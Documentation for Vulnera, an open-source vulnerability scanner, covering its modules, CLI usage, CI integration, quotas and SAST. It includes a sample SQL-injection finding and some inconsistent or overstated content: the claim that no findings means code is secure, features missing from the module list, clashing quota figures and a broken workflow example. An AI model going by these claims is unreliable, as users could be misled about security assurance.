Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

Vulnera — Modular Vulnerability Analysis Platform

Vulnera is an open-source, async Rust platform for multi-ecosystem vulnerability analysis. It combines four purpose-built detection modules under a single orchestrator with sandboxed execution, a typed job pipeline, and optional LLM enrichment.

All core analysis — SAST, secrets detection, and API security — runs fully offline. Dependency CVE lookups require network access to OSV, NVD, and GHSA. LLM enrichment requires network access to the configured provider.


The Four Analysis Modules

ModuleMethodCoverageOffline?
Dependency AnalysisCVE lookup (OSV · NVD · GHSA)npm, PyPI, Cargo, Maven/Gradle, Go, Composer, Bundler, NuGet❌ No
SASTTree-sitter AST + inter-procedural taint analysisPython, JavaScript, TypeScript, Rust, Go, C, C++✅ Yes
Secrets DetectionRegex + entropy detectionAll text files✅ Yes
API SecurityRule-based OpenAPI spec analysisOpenAPI 3.0 / 3.1✅ Yes

LLM enrichment (Google Gemini, OpenAI, Azure OpenAI) is an optional post-processing pass — it adds explanations and fix suggestions to existing findings but is never part of detection.


Documentation Structure

Getting Started

Role-based quick-start guides:

Analysis Capabilities

Module Reference

  • Dependency Analysis — ecosystem coverage, lockfile strategy, version recommendations
  • SAST — supported languages, rule packs, confidence scoring
  • Secrets Detection — detection methods, secret types, baselines
  • API Security — analysis categories, OAuth/OIDC checks, strict mode

AI-Powered Features

Dashboard & Web Platform

Reference


Offline vs. Online Boundaries

Fully offline (no network required):

  • SAST
  • Secrets Detection
  • API Security

Requires network:

  • Dependency Analysis (OSV/NVD/GHSA lookups)
  • LLM enrichment (explanations and fixes)

Self-Hosting

The server is a single Rust binary backed by PostgreSQL and optionally Dragonfly/Redis.

Minimum requirements:

  • Rust 1.91+ (build only)
  • PostgreSQL 12+
  • Linux 5.13+ recommended (for Landlock sandbox; process isolation fallback works on older kernels)
export DATABASE_URL='postgresql://user:pass@localhost:5432/vulnera'
sqlx migrate run
cargo run

Full configuration reference: Configuration


License

Server and all analysis modules: AGPL-3.0-or-later

CLI, Advisors, LSP Adapter: AGPL-3.0-or-later (see each workspace’s LICENSE file)


Contributing

See the project README for the contribution guide, roadmap, and high-impact areas open for community work.

Developer Quick Start (5 Minutes)

For: Individual developers who want offline vulnerability scanning integrated into their workflow.

Goal: Run your first security analysis on a local project in under 5 minutes.

Install Vulnera CLI

Choose your platform:

macOS

curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-macos-aarch64 -o vulnera
chmod +x vulnera
sudo mv vulnera /usr/local/bin/

Linux

curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera
sudo mv vulnera /usr/local/bin/

Windows

Download from GitHub Releases, add to PATH.

Verify Installation

vulnera --version
# Output: Vulnera 0.5.1

Run Your First Analysis (Offline)

# Analyze your current project
vulnera analyze .

# Or any directory
vulnera analyze /path/to/my/nodejs-app

What happens:

  • ✅ Scans all code files for security issues
  • ✅ Detects hardcoded secrets (API keys, tokens, credentials)
  • ✅ Checks for code injection vulnerabilities
  • ✅ Analyzes OpenAPI specs if present
  • ⏱️ Takes 1-10 seconds depending on project size

Output (default table view):

┌────────────────────────────────────────────────────────────┐
│ Vulnera Security Analysis Report                           │
├────────────────────────────────────────────────────────────┤
│ Analysis Duration: 2.3 seconds                              │
│ Modules Run: SAST, Secrets, API                             │
│ Total Findings: 5                                           │
├────────────────────────────────────────────────────────────┤
│ SEVERITY │ COUNT │ MODULE        │ REMEDIATION               │
├──────────┼───────┼───────────────┼──────────────────────────┤
│ HIGH     │ 2     │ Secrets       │ Remove hardcoded keys    │
│ MEDIUM   │ 2     │ SAST (Python) │ Use parameterized queries│
│ LOW      │ 1     │ API Spec      │ Add security headers     │
└────────────────────────────────────────────────────────────┘

See Detailed Findings

vulnera analyze . --format json | jq '.findings[]'

Sample finding:

{
  "id": "SAST-SQL-001",
  "type": "SQL Injection",
  "severity": "high",
  "file": "app.py",
  "line": 42,
  "message": "User input concatenated into SQL query",
  "code": "query = f\"SELECT * FROM users WHERE id={user_id}\"",
  "remediation": "Use parameterized queries: db.query('SELECT * FROM users WHERE id=?', [user_id])"
}

Get AI-Powered Explanations

Want to understand why a finding is important?

# Option 1: Output directly shows summaries
vulnera analyze . --format table

# Option 2: Export to JSON and filter
vulnera analyze . --format json | jq '.findings[] | {id, type, message, remediation}'

Authenticate for Extra Features

Get 4x more quota and enable dependency scanning:

# Get API key at: https://vulnera.studio/dashboard/keys
vulnera auth login --api-key YOUR_API_KEY

# Now you can scan dependencies
vulnera analyze . --all-modules

Pre-Commit Integration

Automatically scan before commits:

Add to .git/hooks/pre-commit

#!/bin/sh
# Run Vulnera analysis on staged files
vulnera analyze . --severity high

if [ $? -ne 0 ]; then
  echo "❌ Security issues found. Fix before committing."
  exit 1
fi

Make it Executable

chmod +x .git/hooks/pre-commit

Test It

git add .
git commit -m "test"
# Will run Vulnera scan before commit

CI/CD Integration

GitHub Actions

Create .github/workflows/security.yml:

name: Security Analysis

on: [push, pull_request]

jobs:
  vulnera:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/download-artifact@v4
        with:
          name: vulnera
      - run: chmod +x vulnera && ./vulnera analyze . --severity high

GitLab CI

Add to .gitlab-ci.yml:

security:
  script:
    - curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
    - chmod +x vulnera
    - ./vulnera analyze . --severity high

Common Commands

# Analyze only secrets (skip code analysis)
vulnera analyze . --skip-sast

# Show only high/critical severity
vulnera analyze . --severity high

# Export to SARIF (for IDE integration)
vulnera analyze . --format sarif > report.sarif

# Check your quota
vulnera quota

# Offline mode (don't use dependency scanning)
vulnera analyze . --offline

Next Steps

  1. Integrate into your IDEIDE Extensions
  2. Learn about all analysis typesAnalysis Capabilities
  3. Get AI-powered explanationsLLM Features
  4. Setup for team usageDevSecOps Quick Start

Troubleshooting

Q: No findings found—is it working? A: That’s good! Your code is secure. Try with --show-passed to see all checks run.

Q: Getting “permission denied” error? A: Make sure the binary is executable: chmod +x vulnera

Q: Want to see what’s detected? A: Run with verbose output: vulnera analyze . -v

Q: Dependency scanning not working? A: You need to authenticate. Get an API key at https://vulnera.studio/dashboard/keys


Questions? Join us on Discord or check the full documentation.

DevSecOps Quick Start (10 Minutes)

For: Security team leads and DevSecOps engineers managing organization-wide vulnerability scanning.

Goal: Set up team-based security scanning with shared quotas, analytics, and multi-project orchestration.

Step 1: Create Organization

vulnera organizations create \
  --name "Engineering Security Team" \
  --description "Security scanning for all projects"

Output:

Organization created: org-abc123
Shared daily quota: 48 tokens (vs 40 for single user)
Admin URL: https://vulnera.studio/orgs/org-abc123/settings

Step 2: Invite Team Members

# Invite security engineer
vulnera organizations add-member \
  --org org-abc123 \
  --email alice@company.com \
  --role admin

# Invite developer with view-only access
vulnera organizations add-member \
  --org org-abc123 \
  --email bob@company.com \
  --role viewer

Roles

RoleCapabilities
OwnerCreate/delete org, manage members, billing, analytics
AdminRun scans, manage members, view analytics
AnalystRun scans, view results, comment on findings
ViewerView-only access to results and analytics

Step 3: Setup Continuous Scanning

GitHub Organization Integration

# Store Vulnera API key as GitHub secret
# Go to Settings → Secrets and variables → Actions → New repository secret
# Name: VULNERA_API_KEY
# Value: (get from vulnera dashboard)

Create .github/workflows/vulnera-scan.yml:

name: Vulnera Security Scan

on:
  push:
    branches: [main, develop]
  pull_request:
    branches: [main]
  schedule:
    - cron: "0 2 * * *" # Daily at 2 AM

jobs:
  vulnera:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Download Vulnera CLI
        run: |
          curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
          chmod +x vulnera

      - name: Run Full Security Analysis
        env:
          VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
        run: |
          ./vulnera analyze . \
            --all-modules \
            --format json \
            --output vulnera-report.json

      - name: Report Results
        run: |
          ./vulnera report vulnera-report.json \
            --format github \
            --post-to-pr

Step 4: View Organization Analytics

# Get team usage summary
vulnera organizations analytics dashboard --org org-abc123

# Get historical usage (last 3 months)
vulnera organizations analytics usage --org org-abc123 --months 3

Sample output:

Organization: Engineering Security Team
Period: December 2024

Daily Usage Trend:
  Dec 1:  ▄ 28 tokens (70%)
  Dec 2:  █ 47 tokens (98%) ← Peak
  Dec 3:  ▂ 12 tokens (30%)
  Avg:    ▃ 31 tokens (65%)

Per-Member Breakdown:
  Alice (alice@company.com): 156 tokens (52%)
  Bob (bob@company.com):     89 tokens (30%)
  Charlie (charlie@...):      54 tokens (18%)

Recommendations:
  - High usage on Dec 2. Consider optimizing batch operations.
  - LLM features used 45% of quota. See quota-pricing.md for cost details.

Step 5: Create Shared Scanning Policies

Severity Filters

# Define which issues to alert on
vulnera organizations policy create \
  --org org-abc123 \
  --name "Production Policy" \
  --min-severity critical,high \
  --affected-projects "*-prod"

Exemptions

# Exclude known false positives
vulnera organizations policy exempt \
  --org org-abc123 \
  --finding-id SAST-SQL-001 \
  --reason "Legacy code, deprecated but functional" \
  --expires 2025-06-30

Step 6: Setup Notifications

Slack Integration

# Get Vulnera webhook URL from dashboard
vulnera organizations integrations connect slack \
  --org org-abc123 \
  --webhook-url https://hooks.slack.com/services/YOUR/WEBHOOK/URL

Notification Rules

# Alert on any critical finding
vulnera organizations notifications create \
  --org org-abc123 \
  --name "Critical Alerts" \
  --condition "severity == critical" \
  --channel slack

# Weekly summary
vulnera organizations notifications create \
  --org org-abc123 \
  --name "Weekly Summary" \
  --condition "summary" \
  --frequency weekly \
  --channel email

Step 7: Scan Multiple Repositories

# Create scanning profile
vulnera organizations profile create \
  --org org-abc123 \
  --name "Standard Scan" \
  --modules "sast,secrets,deps,api" \
  --severity-threshold "high"

# Scan repositories
vulnera scan-repos \
  --org org-abc123 \
  --profile "Standard Scan" \
  --repos "my-org/repo-1,my-org/repo-2,my-org/repo-3"

Step 8: Monitor and Report

Dashboard View

# Open web dashboard
open https://vulnera.studio/orgs/org-abc123/dashboard

Shows:

  • Real-time scan status
  • Vulnerability trends
  • Team member activity
  • Quota usage
  • Historical comparisons

Export Reports

# Export findings to compliance format
vulnera organizations report export \
  --org org-abc123 \
  --format sarif \
  --period "last-month" \
  --output compliance-report.sarif

# Email to stakeholders
vulnera organizations report email \
  --org org-abc123 \
  --recipients security-team@company.com \
  --include-recommendations

Quota Management for Teams

Shared Quota Model

Organization Daily Quota: 48 tokens

Typical usage:
  Monday (high activity):    45 tokens
  Tuesday (low activity):     8 tokens
  Wednesday-Friday (average): 20 tokens each

Weekly pattern: Usually peaks Monday, dips on weekends
Recommendation: Schedule large scans Monday morning

Cost Optimization

# Only scan high/critical severity to save quota
vulnera analyze . --severity high

# Batch LLM explanations (costs 6 tokens total vs 6 per finding)
vulnera analyze . --batch-llm-enrich

# Use organizational discount (48 tokens vs 40 individual)
# 20% savings per team member

Integration Examples

Jira Integration

Auto-create Jira tickets for high-severity findings:

vulnera organizations integrations connect jira \
  --org org-abc123 \
  --jira-url https://company.atlassian.net \
  --api-token YOUR_TOKEN \
  --auto-create-issues \
  --severity-threshold high

Datadog/New Relic APM

Send security metrics to monitoring:

vulnera organizations integrations connect datadog \
  --org org-abc123 \
  --api-key YOUR_DATADOG_KEY \
  --send-metrics \
  --metric-tags "team:security,env:prod"

Common Workflows

Scan on Every Push

# GitHub Actions workflow (see Step 3)
# Results appear as GitHub check
# PR comments show new findings
# Auto-block PRs with critical issues (optional)

Scan on Merge Request

# GitLab CI pipeline
# Results in MR discussion
# Approve/block based on findings

Weekly Security Reports

# Cron job to generate reports
0 9 * * 1 vulnera report generate --org org-abc123 --email security@company.com

Monitoring & Alerting

# Setup alert for quota approaching limit
vulnera organizations alerts create \
  --org org-abc123 \
  --alert "quota_threshold" \
  --threshold 90 \
  --action "email-admin"

# Alert on policy violations
vulnera organizations alerts create \
  --org org-abc123 \
  --alert "policy_violation" \
  --action "slack-notification"

Next Steps

  1. Understand quota costsQuota & Pricing
  2. Create custom analysis policiesPolicy Configuration

Need help? Contact support or join our security community Discord.

Quota & Pricing

This document explains how local CLI quotas and server rate limits work, and how they differ.


Two Separate Systems

1) CLI Local Quota (Per Machine)

The CLI enforces a local daily request limit and persists usage on the machine.

Limits (CLI):

  • Unauthenticated: 10 requests/day
  • Authenticated (API key): 40 requests/day

Where this lives:

  • Stored locally by the CLI (per machine)
  • Reset at UTC midnight
  • You can check status with vulnera quota

Commands:

vulnera auth status
vulnera quota
vulnera quota sync

Notes:

  • The CLI quota is a local guardrail and can be synced with server state if the server is reachable.
  • Offline mode uses local quota only.

2) Server Rate Limits (API)

The server enforces tiered rate limits and token costs per request. This is authoritative for hosted/self-hosted API usage.

Default tiers (from config/default.toml):

  • API key: 100 req/min, 2000 req/hour, burst 20
  • Authenticated (cookie): 60 req/min, 1000 req/hour, burst 10
  • Anonymous: 10 req/min, 100 req/hour, burst 5
  • Org bonus: +20% to tier limits

Token cost weights (per request):

  • GET = 1
  • POST/PUT/DELETE = 2
  • Analysis = 3
  • LLM = 6

These costs apply to the server-side rate limiter, not the CLI local tracker.


Practical Examples

CLI (Local)

  • vulnera analyze . → consumes 1 local request
  • vulnera deps . → consumes 1 local request + server usage

Server (API)

  • POST /api/v1/analyze/job → cost analysis = 3
  • POST /api/v1/llm/explain → cost llm = 6
  • GET /api/v1/quota → cost get = 1

How to Check Usage

CLI (Local)

vulnera quota

Server (API)

curl https://api.vulnera.studio/api/v1/quota \
  -H "X-API-Key: <your_api_key>"

Configuration (Server)

Server limits live in config/default.toml:

  • server.rate_limit.tiers.* for rate tiers
  • server.rate_limit.costs.* for request cost weights
  • server.rate_limit.tiers.org_bonus_percent

Override with environment variables using the VULNERA__ prefix.


Guidance

  • Use the CLI locally for offline modules (SAST, Secrets, API).
  • Use server-backed analysis for dependency scanning and LLM features.
  • Batch LLM enrichment to reduce total cost.

Troubleshooting

Local CLI says quota exceeded

  • Wait for UTC reset or authenticate for 40/day
  • Use vulnera auth login and vulnera quota

Server returns 429

  • You’ve exceeded the configured server tier limits
  • Reduce request volume or increase limits in server config

Cloud Engineer Quick Start (10 Minutes)

For: Cloud/infrastructure engineers scanning S3 buckets, repositories, and cloud-hosted projects.

Goal: Scan cloud resources at scale with automated workflows.

Step 1: Install & Authenticate

# Install CLI
curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera

# Authenticate with API key (get from https://vulnera.studio/dashboard/keys)
vulnera auth login --api-key YOUR_API_KEY

Step 2: Scan S3 Buckets

Scan Single Bucket

vulnera analyze s3://my-bucket/src \
  --aws-profile default \
  --recursive

Scan Multiple Buckets

# Create scanning config
cat > s3-scan-config.toml << EOF
[buckets]
include_patterns = ["prod-*", "app-*"]
exclude_patterns = ["archive-*", "temp-*"]
max_file_size = 1000000  # 1MB
EOF

vulnera analyze-cloud s3 \
  --config s3-scan-config.toml \
  --format json \
  --output s3-findings.json

AWS Credentials

# Use AWS profile
export AWS_PROFILE=production
vulnera analyze s3://production-bucket/

# Or explicit credentials
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...
vulnera analyze s3://my-bucket/

Step 3: Scan GitHub Repositories

Single Repository

vulnera analyze github://owner/repo \
  --branch main \
  --depth full

Organization-Wide Scan

# Scan all repositories in organization
vulnera scan-repos \
  --source github \
  --org my-company \
  --visibility public,private \
  --output org-findings.json

Exclude Patterns

vulnera scan-repos \
  --source github \
  --org my-company \
  --exclude "tests/*,vendor/*,node_modules/*" \
  --max-file-size 1000000

Step 4: Cloud-Native CI/CD Pipelines

AWS CodePipeline

# buildspec.yml
version: 0.2

phases:
  install:
    commands:
      - curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
      - chmod +x vulnera

  build:
    commands:
      - ./vulnera analyze . --all-modules --format json --output vulnera-findings.json
      - ./vulnera report vulnera-findings.json --format codepipeline

artifacts:
  files:
    - vulnera-findings.json

Azure Pipelines

trigger:
  - main

pool:
  vmImage: 'ubuntu-latest'

steps:
  - task: DownloadSecureFile@1
    inputs:
      secureFile: 'vulnera-api-key'

  - script: |
      curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
      chmod +x vulnera
      ./vulnera auth login --api-key $(cat $(Agent.TempDirectory)/vulnera-api-key)
      ./vulnera analyze . --all-modules

  - task: PublishBuildArtifacts@1
    inputs:
      pathToPublish: 'vulnera-findings.json'

GCP Cloud Build

steps:
  - name: 'gcr.io/cloud-builders/docker'
    args:
      - 'build'
      - '-t'
      - 'gcr.io/$PROJECT_ID/vulnera-scanner'
      - '.'

  - name: 'gcr.io/$PROJECT_ID/vulnera-scanner'
    env:
      - 'VULNERA_API_KEY=$_VULNERA_API_KEY'
    args:
      - 'analyze'
      - '/workspace'
      - '--all-modules'
      - '--format'
      - 'json'

Step 5: Kubernetes & Container Scanning

Scan Docker Images

# Before pushing to registry
docker run -v /path/to/app:/app vulnera-scanner \
  analyze /app \
  --all-modules \
  --severity high

Kubernetes Deployment

# kubernetes-job.yaml
apiVersion: batch/v1
kind: CronJob
metadata:
  name: vulnera-scanner
spec:
  schedule: "0 2 * * *"  # 2 AM daily
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: vulnera
            image: vulnera-scanner:latest
            env:
            - name: VULNERA_API_KEY
              valueFrom:
                secretKeyRef:
                  name: vulnera-credentials
                  key: api-key
            command:
            - sh
            - -c
            - |
              vulnera analyze /source --all-modules --format json > /results/findings.json
              vulnera report /results/findings.json --format kubernetes
            volumeMounts:
            - name: source
              mountPath: /source
            - name: results
              mountPath: /results
          volumes:
          - name: source
            emptyDir: {}
          - name: results
            persistentVolumeClaim:
              claimName: scan-results-pvc
          restartPolicy: OnFailure

Step 6: Terraform Scanning

Scan Infrastructure Code

# Scan Terraform modules for security issues
vulnera analyze ./terraform \
  --format json \
  --output tf-findings.json

# Filter by resource type
vulnera findings filter \
  --input tf-findings.json \
  --resource-type aws_security_group \
  --output sg-issues.json

Terraform Module Registry Integration

# main.tf
module "vulnera_scan" {
  source = "git::https://github.com/Vulnera-rs/Vulnera.git//terraform/modules/scanner"

  bucket_name = "my-infrastructure"
  schedule    = "cron(0 2 * * ? *)"  # Daily at 2 AM

  tags = {
    Environment = "production"
  }
}

Step 7: Multi-Cloud Scanning

Scan All Cloud Resources

# Scan across multiple cloud providers
vulnera scan-cloud \
  --providers aws,azure,gcp \
  --config multi-cloud-config.toml \
  --parallel 10

# Results aggregated by resource type
vulnera report cloud-findings.json \
  --group-by provider \
  --format html

Configuration Example

[aws]
regions = ["us-east-1", "us-west-2", "eu-west-1"]
include_s3 = true
include_ec2_images = true
include_rds = true

[azure]
subscriptions = ["prod", "staging"]
include_storage = true

[gcp]
projects = ["project-prod", "project-staging"]
include_storage = true

Step 8: Automated Compliance Reporting

Generate Compliance Reports

# SOC 2 Report
vulnera report generate \
  --format soc2 \
  --period month \
  --include-trends \
  --output soc2-compliance.html

# HIPAA Report
vulnera report generate \
  --format hipaa \
  --include-remediation \
  --output hipaa-compliance.html

Email Reports Automatically

# Schedule weekly reports
vulnera organizations notifications create \
  --org my-cloud-team \
  --name "Weekly Cloud Security" \
  --frequency weekly \
  --day monday \
  --time 9:00 \
  --recipients security@company.com

Common Cloud Workflows

Daily S3 Compliance Check

#!/bin/bash
# daily-s3-scan.sh

BUCKET="production-data"
DATE=$(date +%Y-%m-%d)
REPORT_DIR="/var/reports/vulnera"

vulnera analyze s3://${BUCKET} \
  --recursive \
  --format json \
  --output ${REPORT_DIR}/${DATE}-findings.json

# Alert if critical findings
CRITICAL_COUNT=$(jq '[.findings[] | select(.severity=="critical")] | length' ${REPORT_DIR}/${DATE}-findings.json)

if [ $CRITICAL_COUNT -gt 0 ]; then
  echo "Critical findings in $BUCKET: $CRITICAL_COUNT" | \
    mail -s "ALERT: S3 Security Issues" security@company.com
fi

Multi-Region Analysis

# Parallel scanning across regions
for region in us-east-1 us-west-2 eu-west-1; do
  vulnera analyze-cloud s3 \
    --region $region \
    --output findings-${region}.json &
done
wait

Performance Optimization

Parallel Processing

# Scan multiple buckets in parallel
vulnera analyze-cloud s3 \
  --parallel-jobs 10 \
  --max-file-workers 8

Caching

# Enable caching (24-hour default)
vulnera analyze s3://bucket \
  --cache enabled \
  --cache-ttl 86400

Large Scale Scans

# For enterprise environments
vulnera analyze-cloud \
  --batch-size 1000 \
  --queue-depth 500 \
  --workers 32 \
  --output enterprise-findings.json

Next Steps

  1. Setup organization for team coordinationDevSecOps Quick Start
  2. Understand quota for large-scale scansQuota & Pricing

Need enterprise support? Contact sales@vulnera.studio

Analysis Capabilities Overview

Vulnera provides four specialized analysis modules powered by purpose-built detection techniques. Each module is independently selectable and produces findings in a unified schema.

The Four Analysis Modules

ModulePurposeMethodOffline?Coverage
Dependency AnalysisFind known CVEs in third-party packagesRegistry lookup (OSV · NVD · GHSA)❌ Nonpm, PyPI, Cargo, Maven/Gradle, Go, Composer, Bundler, NuGet
SASTFind security flaws in source codeTree-sitter AST + inter-procedural taint analysis✅ YesPython, JavaScript, TypeScript, Rust, Go, C, C++
Secrets DetectionFind exposed credentials and tokensRegex + entropy detection✅ YesAll text files
API SecurityFind misconfigurations in API specsRule-based spec analysis✅ YesOpenAPI 3.0 / 3.1

LLM enrichment (Google Gemini, OpenAI, Azure OpenAI) is a separate post-processing pass that explains and proposes fixes for findings produced by the modules above. It is never part of detection and requires network access.


How Module Selection Works

The orchestrator uses RuleBasedModuleSelector to automatically activate modules based on file patterns and analysis depth. You do not need to specify modules manually — the right ones run based on what is in the project.

Incoming source (directory / git / S3)
        │
        ▼
  File pattern detection
        │
        ├─ dependency manifests found?  → Dependency Analysis
        ├─ .py / .js / .ts / .rs / .go / .c / .cpp files?  → SAST
        ├─ all files  → Secrets Detection (always runs in Full)
        └─ openapi.yaml / openapi.json / swagger.yaml found?  → API Security
        │
        ▼
  Parallel execution (one sandbox per module)
        │
        ▼
  Aggregated findings report

Analysis Depth (Orchestrator)

The orchestrator uses a coarse analysis depth to decide which modules to run:

DepthDescriptionModules
dependencies_onlyDependencies onlydeps
fast_scanFast scan (dependencies + minimal code analysis)deps + sast
fullFull analysis (all applicable modules)deps + sast + secrets + api

Note: Module coverage still depends on project content. For example, SAST only runs if supported source files are present, and API Security only runs if an OpenAPI spec is detected.


Analysis Depth (SAST)

The SAST module has its own depth semantics (separate from orchestrator depth):

DepthDescription
quickFast pattern matching only (no data-flow analysis)
standardBalanced analysis (patterns + intra-procedural data flow)
deepFull analysis (patterns + data flow + call graph + inter-procedural)

Dynamic depth adjustment is enabled by default. Large repositories are auto-downgraded to keep scans within time budgets. Disable via VULNERA__SAST__DYNAMIC_DEPTH_ENABLED=false.


Offline vs. Online Capabilities

Fully offline (no network required)

  • SAST — rule packs embedded at compile time
  • Secrets Detection — regex + entropy detection locally
  • API Security — OpenAPI rules locally

Requires network

  • Dependency Analysis — CVE lookup against OSV, NVD, GHSA, and registries
  • LLM enrichment — explanations and fixes via external providers

Unified Finding Schema

Every module emits findings in the same structure:

{
  "id": "SAST-PY-SQL-001",
  "type": "vulnerability",
  "rule_id": "python-sql-injection",
  "location": {
    "path": "src/db.py",
    "line": 42,
    "column": 5,
    "end_line": 42,
    "end_column": 48
  },
  "severity": "high",
  "confidence": "high",
  "description": "User input concatenated directly into SQL query.",
  "recommendation": "Use parameterized queries or a query builder.",
  "secret_metadata": null,
  "vulnerability_metadata": {
    "snippet": "query = f\"SELECT * FROM users WHERE id={user_id}\"",
    "bindings": null,
    "semantic_path": null
  },
  "enrichment": null
}

The enrichment field is populated only when LLM enrichment is requested after analysis; secret_metadata is only present for secret findings.


Module-Specific Documentation

  • Dependency Analysis — ecosystem coverage, lockfile strategy, version recommendations
  • SAST — supported languages, rule packs, taint analysis, confidence scoring
  • Secrets Detection — detection methods, secret types, baselines
  • API Security — analysis categories, detected issue types, strict mode

Dependency Analysis

The Dependency Analysis module scans dependency manifests and lockfiles across multiple ecosystems to identify known vulnerabilities. It requires network access for CVE lookups (OSV, NVD, GHSA).

Supported Ecosystems

EcosystemFiles
Python (PyPI)requirements.txt, Pipfile, pyproject.toml
Node.js (npm)package.json, package-lock.json, yarn.lock
Java (Maven/Gradle)pom.xml, build.gradle
Rust (Cargo)Cargo.toml, Cargo.lock
Gogo.mod, go.sum
PHP (Composer)composer.json, composer.lock
Ruby (Bundler)Gemfile, Gemfile.lock
.NET (NuGet)packages.config, *.csproj, *.props, *.targets

Online Requirement

Dependency analysis requires a server connection to query vulnerability sources:

  • OSV
  • NVD
  • GHSA

Running in offline mode skips dependency analysis.

Resolution Strategy

Vulnera uses a hybrid resolution approach:

  • Lockfile-first — Extracts a fully resolved dependency tree from lockfiles for accurate transitive coverage.
  • Manifest-only fallback — Best-effort resolution via registry metadata when lockfiles are absent.

Known gaps: Lockfile-independent transitive resolution is incomplete for some ecosystems (notably npm and PyPI).

Features

  • Directed dependency graph with reachability analysis
  • Concurrent vulnerability lookups with configurable limits
  • Safe version recommendations with patch/minor/major impact classification
  • CWE normalization and filtering
  • Advisory intelligence via vulnera-advisor

Detail Levels

LevelBest ForIncludes
minimalStatus badgesVulnerabilities list, basic metadata
standardInline decorations, quick fixesVulnerabilities, packages, version recommendations
fullDetailed reports, dependency treesAll data + dependency graph

Output Example

{
  "package": "lodash",
  "current_version": "4.17.15",
  "vulnerability": "CVE-2021-23337",
  "recommendations": {
    "nearest_safe": "4.17.21",
    "latest_safe": "4.17.21",
    "upgrade_impact": "patch"
  }
}

CLI Usage

Dependency analysis runs via vulnera deps (online only):

# Basic scan
vulnera deps .

# Include transitive dependencies
vulnera deps . --include-transitive

# Force rescan (ignore local cache)
vulnera deps . --force-rescan

Next Steps

SAST Module (Static Application Security Testing)

The SAST module performs offline, multi-language static analysis using Tree-sitter parsing, optional OXC frontend for JS/TS, and inter-procedural taint analysis with call-graph support.

Overview

SAST analyzes source code to detect security flaws such as injection, insecure crypto, unsafe deserialization, and risky unsafe usage patterns. It emits findings in Vulnera’s unified schema and supports SARIF output.

Supported Languages

LanguageParserFile Extensions
Pythontree-sitter-python.py
JavaScripttree-sitter-javascript / OXC.js
TypeScripttree-sitter-javascript / OXC.ts
Rusttree-sitter-rust.rs
Gotree-sitter-go.go
Ctree-sitter-c.c, .h
C++tree-sitter-cpp.cpp, .cc, .hpp

Note: JSX/TSX files are not scanned.

Pipeline (High-Level)

  1. Discovery — Walks files and maps them to supported languages.
  2. Parsing — Builds ASTs with Tree-sitter; optional OXC for JS/TS.
  3. Rule matching — Applies TOML rule packs to AST patterns.
  4. Taint analysis — Tracks source → sink flow across functions and files.
  5. Call graph — Resolves cross-file calls to expand reachability.
  6. Post-process — Dedupes, scores severity/confidence, emits findings.

Rule System

SAST rules are TOML-based and embedded at build time. Optional Git-based rule packs can be configured.

Rule locations:

  • vulnera-sast/rules/*.toml — core rule packs
  • vulnera-sast/taint-patterns/*.toml — taint sources/sinks/sanitizers
  • vulnera-sast/tests/fixtures/ — CVE fixtures for quality gates

Analysis Depth (SAST)

Depth controls the SAST engine’s thoroughness (separate from orchestrator depth):

DepthDescription
quickPattern matching only (no data-flow analysis)
standardPatterns + intra-procedural data flow
deepFull analysis (patterns + data flow + call graph + inter-procedural)

Dynamic depth adjustment is enabled by default to keep large repos within time budgets.

CLI Usage (Actual Flags)

# Basic scan
vulnera sast .

# Severity filter
vulnera sast . --min-severity high

# Only changed files (git required)
vulnera sast . --changed-only

# Exclude paths (glob patterns)
vulnera sast . --exclude "tests/*,vendor/*"

Available flags:

  • --min-severity <critical|high|medium|low>
  • --fail-on-vuln
  • --changed-only
  • --files <path1,path2,...>
  • --exclude <glob1,glob2,...>
  • --languages <lang1,lang2,...> (override auto-detection)
  • --rules <category1,category2,...> (rule categories)
  • --no-cache (disable incremental cache)
  • --watch (continuous scanning)
  • --fix (LLM-powered bulk fixes; requires online + auth + quota)
  • --baseline <path> (baseline file for diff)
  • --save-baseline (save current findings to baseline)
  • --only-new (report only findings not in baseline)

Configuration

Configured via vulnera_core::config::SastConfig and AnalysisConfig.

Key settings:

  • analysis_depth = "quick|standard|deep"
  • js_ts_frontend = "oxc_preferred" | "tree_sitter"
  • enable_data_flow, enable_call_graph
  • enable_ast_cache, ast_cache_ttl_hours
  • dynamic_depth_enabled, file/size thresholds
  • min_finding_severity, min_finding_confidence
  • rule_packs and rule_pack_allowlist

Example (TOML):

[sast]
analysis_depth = "standard"
js_ts_frontend = "oxc_preferred"
enable_data_flow = true
enable_call_graph = true
enable_ast_cache = true
dynamic_depth_enabled = true
min_finding_severity = "low"
min_finding_confidence = "low"

Output

Findings include:

  • severity and confidence
  • location (path + line/column)
  • optional snippet and semantic_path (taint trace)

SARIF output:

vulnera sast . --format sarif > report.sarif

Quality Gates

Fixture-based accuracy thresholds are enforced in CI (from config/default.toml):

  • Precision: ≥ 0.70
  • Recall: ≥ 0.50
  • Unique CWE coverage: ≥ 12
  • Languages with fixtures: ≥ 7

Limitations

  • Tree-sitter is syntax-level; no macro expansion or full type resolution.
  • Runtime behavior and dynamic code generation are out of scope.
  • JSX/TSX files are excluded.

Next Steps

SAST (Static Application Security Testing)

Vulnera SAST detects security issues in source code using Tree-sitter parsing, a call-graph builder, and inter-procedural taint analysis. It is fully offline and runs locally.

What It Detects

Common categories include:

  • SQL injection and command injection
  • XSS and HTML injection
  • Unsafe deserialization and dynamic code execution
  • Insecure crypto and weak randomness
  • Path traversal and file disclosure
  • Unsafe unsafe usage patterns (Rust)

